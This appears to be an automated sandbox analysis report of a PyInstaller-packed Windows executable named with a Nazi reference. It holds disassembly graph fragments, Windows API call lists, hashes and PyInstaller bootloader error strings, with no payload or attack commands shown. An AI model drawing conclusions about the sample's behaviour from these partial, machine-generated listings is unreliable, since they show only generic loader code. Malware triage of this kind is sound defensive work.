Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19671->19679 19672->19666 19674 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19672->19674 19673->19669 19677 7ff633d755f6 19674->19677 19678 7ff633d74f08 _get_daylight 11 API calls 19675->19678 19680 7ff633d7d5fc _fread_nolock 12 API calls 19676->19680 19677->19666 19677->19667 19678->19666 19679->19676 
19680->19672 19682 7ff633d79225 19681->19682 19689 7ff633d79221 19681->19689 19702 7ff633d82a3c GetEnvironmentStringsW 19682->19702 19685 7ff633d79232 19687 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19685->19687 19686 7ff633d7923e 19709 7ff633d7938c 19686->19709 19687->19689 19689->19337 19694 7ff633d795cc 19689->19694 19691 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19692 7ff633d79265 19691->19692 19693 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19692->19693 19693->19689 19695 7ff633d795ef 19694->19695 19700 7ff633d79606 19694->19700 19695->19337 19696 7ff633d7eb98 _get_daylight 11 API calls 19696->19700 19697 7ff633d7967a 19699 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19697->19699 19698 7ff633d7f8a0 MultiByteToWideChar _fread_nolock 19698->19700 19699->19695 19700->19695 19700->19696 19700->19697 19700->19698 19701 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19700->19701 19701->19700 19703 7ff633d7922a 19702->19703 19706 7ff633d82a60 19702->19706 19703->19685 19703->19686 19704 7ff633d7d5fc _fread_nolock 12 API calls 19705 7ff633d82a97 memcpy_s 19704->19705 19707 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19705->19707 19706->19704 19708 7ff633d82ab7 FreeEnvironmentStringsW 19707->19708 19708->19703 19710 7ff633d793b4 19709->19710 19711 7ff633d7eb98 _get_daylight 11 API calls 19710->19711 19724 7ff633d793ef 19711->19724 19712 7ff633d793f7 19713 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19712->19713 19715 7ff633d79246 19713->19715 19714 7ff633d79471 19716 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19714->19716 19715->19691 19716->19715 19717 7ff633d7eb98 _get_daylight 11 API calls 19717->19724 19718 7ff633d79460 19720 7ff633d794a8 11 API calls 19718->19720 19719 7ff633d80474 37 API calls 19719->19724 19721 
7ff633d79468 19720->19721 19722 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19721->19722 19722->19712 19723 7ff633d79494 19725 7ff633d7a900 _isindst 17 API calls 19723->19725 19724->19712 19724->19714 19724->19717 19724->19718 19724->19719 19724->19723 19726 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19724->19726 19727 7ff633d794a6 19725->19727 19726->19724 19730 7ff633d88b31 __crtLCMapStringW 19728->19730 19729 7ff633d870ee 19729->19363 19729->19364 19730->19729 19731 7ff633d7ef68 6 API calls 19730->19731 19731->19729 20555 7ff633d6cb50 20556 7ff633d6cb60 20555->20556 20572 7ff633d79ba8 20556->20572 20558 7ff633d6cb6c 20578 7ff633d6ce48 20558->20578 20560 7ff633d6cbd9 20561 7ff633d6d12c 7 API calls 20560->20561 20571 7ff633d6cbf5 20560->20571 20563 7ff633d6cc05 20561->20563 20562 7ff633d6cb84 _RTC_Initialize 20562->20560 20583 7ff633d6cff8 20562->20583 20565 7ff633d6cb99 20586 7ff633d79014 20565->20586 20573 7ff633d79bb9 20572->20573 20574 7ff633d79bc1 20573->20574 20575 7ff633d74f08 _get_daylight 11 API calls 20573->20575 20574->20558 20576 7ff633d79bd0 20575->20576 20577 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20576->20577 20577->20574 20579 7ff633d6ce59 20578->20579 20580 7ff633d6ce5e __scrt_acquire_startup_lock 20578->20580 20579->20580 20581 7ff633d6d12c 7 API calls 20579->20581 20580->20562 20582 7ff633d6ced2 20581->20582 20611 7ff633d6cfbc 20583->20611 20585 7ff633d6d001 20585->20565 20587 7ff633d79034 20586->20587 20609 7ff633d6cba5 20586->20609 20588 7ff633d7903c 20587->20588 20589 7ff633d79052 GetModuleFileNameW 20587->20589 20590 7ff633d74f08 _get_daylight 11 API calls 20588->20590 20593 7ff633d7907d 20589->20593 20591 7ff633d79041 20590->20591 20592 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20591->20592 20592->20609 20594 7ff633d78fb4 11 API calls 20593->20594 20595 7ff633d790bd 20594->20595 20596 7ff633d790c5 20595->20596 20599 7ff633d790dd 20595->20599 20597 
7ff633d74f08 _get_daylight 11 API calls 20596->20597 20598 7ff633d790ca 20597->20598 20601 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20598->20601 20600 7ff633d790ff 20599->20600 20603 7ff633d7912b 20599->20603 20604 7ff633d79144 20599->20604 20602 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20600->20602 20601->20609 20602->20609 20605 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20603->20605 20607 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20604->20607 20606 7ff633d79134 20605->20606 20608 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20606->20608 20607->20600 20608->20609 20609->20560 20610 7ff633d6d0cc InitializeSListHead 20609->20610 20612 7ff633d6cfd6 20611->20612 20614 7ff633d6cfcf 20611->20614 20615 7ff633d7a1ec 20612->20615 20614->20585 20618 7ff633d79e28 20615->20618 20625 7ff633d802d8 EnterCriticalSection 20618->20625 20365 7ff633d7afd0 20366 7ff633d7afd5 20365->20366 20367 7ff633d7afea 20365->20367 20371 7ff633d7aff0 20366->20371 20372 7ff633d7b032 20371->20372 20373 7ff633d7b03a 20371->20373 20374 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20372->20374 20375 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20373->20375 20374->20373 20376 7ff633d7b047 20375->20376 20377 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20376->20377 20378 7ff633d7b054 20377->20378 20379 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20378->20379 20380 7ff633d7b061 20379->20380 20381 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20380->20381 20382 7ff633d7b06e 20381->20382 20383 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20382->20383 20384 7ff633d7b07b 20383->20384 20385 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 
20384->20385 20386 7ff633d7b088 20385->20386 20387 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20386->20387 20388 7ff633d7b095 20387->20388 20389 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20388->20389 20390 7ff633d7b0a5 20389->20390 20391 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20390->20391 20392 7ff633d7b0b5 20391->20392 20397 7ff633d7ae94 20392->20397 20411 7ff633d802d8 EnterCriticalSection 20397->20411 20626 7ff633d79d50 20629 7ff633d79ccc 20626->20629 20636 7ff633d802d8 EnterCriticalSection 20629->20636

Control-flow Graph (graph image not included; legend: Executed / Not Executed)
                                                                                                                                                                                                                                            control_flow_graph 0 7ff633d689e0-7ff633d68b26 call 7ff633d6c850 call 7ff633d69390 SetConsoleCtrlHandler GetStartupInfoW call 7ff633d753f0 call 7ff633d7a47c call 7ff633d7871c call 7ff633d753f0 call 7ff633d7a47c call 7ff633d7871c call 7ff633d753f0 call 7ff633d7a47c call 7ff633d7871c GetCommandLineW CreateProcessW 23 7ff633d68b4d-7ff633d68b89 RegisterClassW 0->23 24 7ff633d68b28-7ff633d68b48 GetLastError call 7ff633d62c50 0->24 26 7ff633d68b8b GetLastError 23->26 27 7ff633d68b91-7ff633d68be5 CreateWindowExW 23->27 32 7ff633d68e39-7ff633d68e5f call 7ff633d6c550 24->32 26->27 29 7ff633d68be7-7ff633d68bed GetLastError 27->29 30 7ff633d68bef-7ff633d68bf4 ShowWindow 27->30 31 7ff633d68bfa-7ff633d68c0a WaitForSingleObject 29->31 30->31 33 7ff633d68c0c 31->33 34 7ff633d68c88-7ff633d68c8f 31->34 36 7ff633d68c10-7ff633d68c13 33->36 37 7ff633d68cd2-7ff633d68cd9 34->37 38 7ff633d68c91-7ff633d68ca1 WaitForSingleObject 34->38 40 7ff633d68c1b-7ff633d68c22 36->40 41 7ff633d68c15 GetLastError 36->41 44 7ff633d68dc0-7ff633d68dd9 GetMessageW 37->44 45 7ff633d68cdf-7ff633d68cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->45 42 7ff633d68df8-7ff633d68e02 38->42 43 7ff633d68ca7-7ff633d68cb7 TerminateProcess 38->43 40->38 47 7ff633d68c24-7ff633d68c41 PeekMessageW 40->47 41->40 50 7ff633d68e04-7ff633d68e0a DestroyWindow 42->50 51 7ff633d68e11-7ff633d68e35 GetExitCodeProcess CloseHandle * 2 42->51 52 7ff633d68cb9 GetLastError 43->52 53 7ff633d68cbf-7ff633d68ccd WaitForSingleObject 43->53 48 7ff633d68ddb-7ff633d68de9 TranslateMessage DispatchMessageW 44->48 49 7ff633d68def-7ff633d68df6 44->49 46 7ff633d68d00-7ff633d68d38 MsgWaitForMultipleObjects PeekMessageW 45->46 54 7ff633d68d3a 46->54 55 7ff633d68d73-7ff633d68d7a 46->55 56 
7ff633d68c76-7ff633d68c86 WaitForSingleObject 47->56 57 7ff633d68c43-7ff633d68c74 TranslateMessage DispatchMessageW PeekMessageW 47->57 48->49 49->42 49->44 50->51 51->32 52->53 53->42 58 7ff633d68d40-7ff633d68d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->44 59 7ff633d68d7c-7ff633d68da5 QueryPerformanceCounter 55->59 56->34 56->36 57->56 57->57 58->55 58->58 59->46 60 7ff633d68dab-7ff633d68db2 59->60 60->42 61 7ff633d68db4-7ff633d68db8 60->61 61->44
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 8cf410ab41b0fa40752e760cc4270562d31a1d9cbf9cda09278e672fccba3f4d
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: C9D1A832A08B8286E7108FB4E8562AD3764FF84B58F401335DA6EA7BA5DF3CE155D700

Control-flow Graph (graph image not included; legend: Executed / Not Executed)
                                                                                                                                                                                                                                            control_flow_graph 62 7ff633d61000-7ff633d63806 call 7ff633d6fe18 call 7ff633d6fe20 call 7ff633d6c850 call 7ff633d753f0 call 7ff633d75484 call 7ff633d636b0 76 7ff633d63808-7ff633d6380f 62->76 77 7ff633d63814-7ff633d63836 call 7ff633d61950 62->77 78 7ff633d63c97-7ff633d63cb2 call 7ff633d6c550 76->78 82 7ff633d6391b-7ff633d63931 call 7ff633d645c0 77->82 83 7ff633d6383c-7ff633d63856 call 7ff633d61c80 77->83 90 7ff633d6396a-7ff633d6397f call 7ff633d62710 82->90 91 7ff633d63933-7ff633d63960 call 7ff633d67f90 82->91 87 7ff633d6385b-7ff633d6389b call 7ff633d68830 83->87 97 7ff633d6389d-7ff633d638a3 87->97 98 7ff633d638c1-7ff633d638cc call 7ff633d74f30 87->98 101 7ff633d63c8f 90->101 99 7ff633d63962-7ff633d63965 call 7ff633d7004c 91->99 100 7ff633d63984-7ff633d639a6 call 7ff633d61c80 91->100 102 7ff633d638a5-7ff633d638ad 97->102 103 7ff633d638af-7ff633d638bd call 7ff633d689a0 97->103 109 7ff633d639fc-7ff633d63a2a call 7ff633d68940 call 7ff633d689a0 * 3 98->109 110 7ff633d638d2-7ff633d638e1 call 7ff633d68830 98->110 99->90 115 7ff633d639b0-7ff633d639b9 100->115 101->78 102->103 103->98 138 7ff633d63a2f-7ff633d63a3e call 7ff633d68830 109->138 119 7ff633d638e7-7ff633d638ed 110->119 120 7ff633d639f4-7ff633d639f7 call 7ff633d74f30 110->120 115->115 118 7ff633d639bb-7ff633d639d8 call 7ff633d61950 115->118 118->87 130 7ff633d639de-7ff633d639ef call 7ff633d62710 118->130 124 7ff633d638f0-7ff633d638fc 119->124 120->109 127 7ff633d63905-7ff633d63908 124->127 128 7ff633d638fe-7ff633d63903 124->128 127->120 131 7ff633d6390e-7ff633d63916 call 7ff633d74f30 127->131 128->124 128->127 130->101 131->138 141 7ff633d63b45-7ff633d63b53 138->141 142 7ff633d63a44-7ff633d63a47 138->142 143 7ff633d63a67 141->143 144 7ff633d63b59-7ff633d63b5d 141->144 142->141 145 
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 27943e01e1a6207795b46aedf17b893e8f8e32d3898c7290fa00b00b011f2019
• Instruction ID: 0eb346d6c770e15e92253ca69477e5e7d831923dfad77cb800914853cad8e879
• Opcode Fuzzy Hash: 27943e01e1a6207795b46aedf17b893e8f8e32d3898c7290fa00b00b011f2019
• Instruction Fuzzy Hash: 0432AC21A0C68291FB15DBA494573B973A1AF44780FC44236DA6DE77E6EF2CF558E300

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: 89c632f8cecc42cd5d3a3afa7ff96505a68fc3a8e9bccf3b8a24fbe497977bd1
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 14C1AF36B28A4585EB11CFA9C4926AC3761FB49BA8B015335DF2EAB7D4DF38E055D300

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D6842B
• RemoveDirectoryW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684AE
• DeleteFileW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684CD
• FindNextFileW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684DB
• FindClose.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684EC
• RemoveDirectoryW.KERNELBASE(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction ID: 3d6ec63bfd8af715c8e5da51951a36cb782d4503c1980f80a6f345d69cf020b1
• Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction Fuzzy Hash: B1417331A0C98285EA309BA4E4565BA7361FB94755FC00332DAAEE77D8EF3CE549D700
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: c398fd0573cd36a510ed8dd3cff5e559f13ae2d8f5793ff5aa1c63212eee7f96
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: 75F0C832A1874186F7A08FA0B49A7667350BB84328F840335D97F567D4DF3CD058DB00

Control-flow Graph
APIs
  • Part of subcall function 00007FF633D67F90: _fread_nolock.LIBCMT ref: 00007FF633D6803A
• _fread_nolock.LIBCMT ref: 00007FF633D61A1B
  • Part of subcall function 00007FF633D62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
• Instruction ID: 1855953544a3383a96094cab659c93698b37e88630c9d79497d49a2ddd2127ab
• Opcode Fuzzy Hash: e060d84aa5bf36d8a380aea433863807716a2bfcfbbc2a242715e1548c9dcf31
• Instruction Fuzzy Hash: 0C81C371A0C68286EB20DBA4D0532FD73A0FF88784F844635E99DE7795DE3CE585A740

Control-flow Graph

Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: cb3c2a77d8d213a9a8c367c96bf5f808a4f883a2ce5e30ac5d600dd79daf51e0
• Instruction ID: a6bdfd9945747aa285e8d803024d7a6b3daf8c6c94dac3d1c141db40db657a2b
• Opcode Fuzzy Hash: cb3c2a77d8d213a9a8c367c96bf5f808a4f883a2ce5e30ac5d600dd79daf51e0
• Instruction Fuzzy Hash: 3D51B061B0864392EA10ABE1A4131B973A0BF84794F844732EEACE77D6DF3CF555A740

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF633D63CBB), ref: 00007FF633D68704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF633D63CBB), ref: 00007FF633D6870A
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF633D63CBB), ref: 00007FF633D6874C
  • Part of subcall function 00007FF633D68830: GetEnvironmentVariableW.KERNEL32(00007FF633D6388E), ref: 00007FF633D68867
  • Part of subcall function 00007FF633D68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF633D68889
  • Part of subcall function 00007FF633D78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D78251
  • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
Strings
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
• Instruction ID: 75af0323ff9a80efafbbee8e034c6139ae6b0d248ea7fffc3df1f4c364d7745c
• Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
• Instruction Fuzzy Hash: A341A421A1964284FA10ABE5A8672B963A1AF847C1FC05331ED1DFB7DADE3CE545E340

Control-flow Graph

Strings
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
• Instruction ID: d5e919ad1cdf2258e930a2683505d67dca29f55f9e989f0f3a5ac0180549bd08
• Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
• Instruction Fuzzy Hash: 6251F822A0864285EA209F91E4523BA7390FF85794F844335ED9EE77D5EF3CE545E700

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,-00000018,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,-00000018,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction ID: 1c2119cbf279b8d7d58f80f071047de15deef92be4f66182e6d03bbbaf58a44b
• Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction Fuzzy Hash: BD412821B29A1281FB15CF96AC126752391BF49BD0F894739DD1DEB7A4EF3CE415A300

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636E1
• GetLastError.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636EB
  • Part of subcall function 00007FF633D62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
  • Part of subcall function 00007FF633D62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
  • Part of subcall function 00007FF633D62C50: MessageBoxW.USER32 ref: 00007FF633D62D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: c13f2a38a5be17a066d117a47e39e6235b7b3cb1b116aea74476be53e48fcbf7
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
